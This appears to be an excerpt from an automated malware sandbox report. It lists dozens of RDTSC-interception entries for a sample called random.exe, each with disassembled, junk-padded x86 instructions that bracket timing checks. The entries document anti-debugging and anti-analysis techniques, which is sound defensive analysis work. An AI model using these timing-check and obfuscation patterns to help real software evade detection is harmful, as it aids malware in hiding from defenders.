                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2D9D00 second address: 2D9D1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3458756CB9h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2D9E7A second address: 2D9EA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pushad 0x00000008 je 00007F3458CA5159h 0x0000000e jng 00007F3458CA5148h 0x00000014 push eax 0x00000015 push edx 0x00000016 push edx 0x00000017 pop edx 0x00000018 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2DD6BF second address: 2DD6C5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2DD6C5 second address: 2DD6F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3458CA5152h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F3458CA5157h 0x00000014 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 272D77 second address: 272D81 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F3458756CA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2E1847 second address: 2E184B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2E184B second address: 2E1851 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2E1851 second address: 2E1857 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2E64D0 second address: 2E64F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3458756CB7h 0x00000007 jns 00007F3458756CA6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2E6621 second address: 2E6634 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3458CA514Eh 0x00000009 popad 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2E67A1 second address: 2E67A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2E6FD3 second address: 2E6FD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2E6FD9 second address: 2E6FE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F3458756CA6h 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2EB4E2 second address: 2EB4F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3458CA514Ch 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2EB4F7 second address: 2EB504 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2EB504 second address: 2EB51F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3458CA514Ch 0x00000009 popad 0x0000000a jmp 00007F3458CA514Ah 0x0000000f rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2EB51F second address: 2EB525 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2EB525 second address: 2EB529 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2EB976 second address: 2EB9BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F3458756CB9h 0x0000000b popad 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pushad 0x00000012 popad 0x00000013 ja 00007F3458756CA6h 0x00000019 popad 0x0000001a popad 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F3458756CB6h 0x00000023 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2EB9BE second address: 2EB9DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3458CA5157h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2EC3C5 second address: 2EC3D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F3458756CB8h 0x0000000c jl 00007F3458756CB2h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2EC3D9 second address: 2EC3DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2EC511 second address: 2EC517 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2EC517 second address: 2EC53A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F3458CA5157h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2EC53A second address: 2EC547 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F3458756CACh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2EC547 second address: 2EC550 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2A06C0 second address: 2A06C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2F2206 second address: 2F220D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2F10CB second address: 2F10CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2F10CF second address: 2F10D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2B58F7 second address: 2B591E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3458756CADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3458756CB3h 0x00000011 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2B591E second address: 2B59A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3458CA514Fh 0x00000008 jmp 00007F3458CA5153h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 ja 00007F3458CA5165h 0x00000017 call 00007F3458CA514Fh 0x0000001c jmp 00007F3458CA514Fh 0x00000021 pop edx 0x00000022 lea eax, dword ptr [ebp+1247A6B5h] 0x00000028 push 00000000h 0x0000002a push ebx 0x0000002b call 00007F3458CA5148h 0x00000030 pop ebx 0x00000031 mov dword ptr [esp+04h], ebx 0x00000035 add dword ptr [esp+04h], 0000001Ch 0x0000003d inc ebx 0x0000003e push ebx 0x0000003f ret 0x00000040 pop ebx 0x00000041 ret 0x00000042 mov ecx, 2D322D35h 0x00000047 push eax 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d popad 0x0000004e rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2B59A2 second address: 2B59A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2B59A6 second address: 2B59AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2B59AC second address: 2B59B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2B59B3 second address: 29FBCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F3458CA5148h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 call dword ptr [ebp+122D3413h] 0x0000002a pushad 0x0000002b push eax 0x0000002c jnc 00007F3458CA5146h 0x00000032 pushad 0x00000033 popad 0x00000034 pop eax 0x00000035 jnl 00007F3458CA514Eh 0x0000003b je 00007F3458CA5148h 0x00000041 pushad 0x00000042 popad 0x00000043 push esi 0x00000044 pushad 0x00000045 popad 0x00000046 jmp 00007F3458CA5158h 0x0000004b pop esi 0x0000004c popad 0x0000004d pushad 0x0000004e jnl 00007F3458CA514Ah 0x00000054 jmp 00007F3458CA5151h 0x00000059 pushad 0x0000005a jc 00007F3458CA5146h 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2B5AC0 second address: 2B5AF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3458756CABh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f jmp 00007F3458756CB9h 0x00000014 push eax 0x00000015 push edx 0x00000016 push edx 0x00000017 pop edx 0x00000018 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2B613B second address: 2B6140 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2B6140 second address: 2B6146 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2B6146 second address: 2B6169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3458CA5157h 0x00000011 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2B6169 second address: 2B616D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2B616D second address: 2B6173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2B6173 second address: 2B61C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007F3458756CABh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, esi 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007F3458756CA8h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 00000019h 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 pushad 0x00000029 mov dword ptr [ebp+122D1DADh], edx 0x0000002f adc edx, 27120146h 0x00000035 popad 0x00000036 push esi 0x00000037 add edx, 1E02864Eh 0x0000003d pop ecx 0x0000003e nop 0x0000003f pushad 0x00000040 push edi 0x00000041 push ebx 0x00000042 pop ebx 0x00000043 pop edi 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 popad 0x00000048 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2B61C8 second address: 2B61D6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2B61D6 second address: 2B61DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2B61DA second address: 2B61E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2B633F second address: 2B635D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3458756CB5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2B6A92 second address: 2B6A96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2B6A96 second address: 2B6A9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2B6A9C second address: 2B6AA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2B6B58 second address: 2B6BEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007F3458756CA8h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 00000014h 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 sub dword ptr [ebp+122D2320h], ebx 0x00000029 lea eax, dword ptr [ebp+1247A6F9h] 0x0000002f or ch, 00000070h 0x00000032 push eax 0x00000033 jmp 00007F3458756CB6h 0x00000038 mov dword ptr [esp], eax 0x0000003b add edi, dword ptr [ebp+122D2B8Ch] 0x00000041 lea eax, dword ptr [ebp+1247A6B5h] 0x00000047 push 00000000h 0x00000049 push edx 0x0000004a call 00007F3458756CA8h 0x0000004f pop edx 0x00000050 mov dword ptr [esp+04h], edx 0x00000054 add dword ptr [esp+04h], 0000001Dh 0x0000005c inc edx 0x0000005d push edx 0x0000005e ret 0x0000005f pop edx 0x00000060 ret 0x00000061 push eax 0x00000062 pushad 0x00000063 pushad 0x00000064 jmp 00007F3458756CB0h 0x00000069 push eax 0x0000006a push edx 0x0000006b rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2B6BEC second address: 2A06C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007F3458CA514Ch 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007F3458CA5148h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 0000001Bh 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 mov cx, ax 0x0000002c sbb dl, 0000000Ch 0x0000002f mov ecx, dword ptr [ebp+122D2CF8h] 0x00000035 call dword ptr [ebp+122D28BEh] 0x0000003b pushad 0x0000003c pushad 0x0000003d pushad 0x0000003e popad 0x0000003f jmp 00007F3458CA5157h 0x00000044 jmp 00007F3458CA5150h 0x00000049 popad 0x0000004a push ecx 0x0000004b jno 00007F3458CA5146h 0x00000051 pop ecx 0x00000052 jnc 00007F3458CA5151h 0x00000058 jmp 00007F3458CA514Bh 0x0000005d push ebx 0x0000005e push ebx 0x0000005f pop ebx 0x00000060 pop ebx 0x00000061 popad 0x00000062 push eax 0x00000063 push edx 0x00000064 jnp 00007F3458CA514Ch 0x0000006a rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2F13AF second address: 2F13BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007F3458756CA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2F14FC second address: 2F1513 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3458CA5151h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2F1513 second address: 2F1517 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2F1517 second address: 2F155C instructions: 0x00000000 rdtsc 0x00000002 jg 00007F3458CA5146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F3458CA5156h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jl 00007F3458CA5169h 0x00000017 jno 00007F3458CA514Eh 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F3458CA514Bh 0x00000024 push esi 0x00000025 pop esi 0x00000026 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2F16D9 second address: 2F16E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2F16E2 second address: 2F16F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3458CA514Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2F16F2 second address: 2F16FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F3458756CA6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2F16FE second address: 2F1702 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2F1991 second address: 2F199B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F3458756CA6h 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2F199B second address: 2F199F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2F199F second address: 2F19A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2F1AE7 second address: 2F1AF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3458CA514Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2F1AF7 second address: 2F1AFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2F676E second address: 2F6773 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2F68BE second address: 2F68C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2F68C3 second address: 2F68C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2F68C9 second address: 2F68D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F3458756CA6h 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2F6D22 second address: 2F6D3E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3458CA5153h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2F6D3E second address: 2F6D43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2F6E93 second address: 2F6E97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2F73A7 second address: 2F73AD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2FA4D8 second address: 2FA4DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2FD803 second address: 2FD80D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 3015EE second address: 3015F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 3015F4 second address: 3015FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 3011DB second address: 3011E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 308DD7 second address: 308DE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F3458756CA6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 30D3C3 second address: 30D3CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2B668C second address: 2B6690 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2B6690 second address: 2B6695 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 30D906 second address: 30D913 instructions: 0x00000000 rdtsc 0x00000002 js 00007F3458756CA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 30D913 second address: 30D91F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edi 0x00000007 popad 0x00000008 pushad 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 30D91F second address: 30D93C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 jg 00007F3458756CAEh 0x0000000d jbe 00007F3458756CB2h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
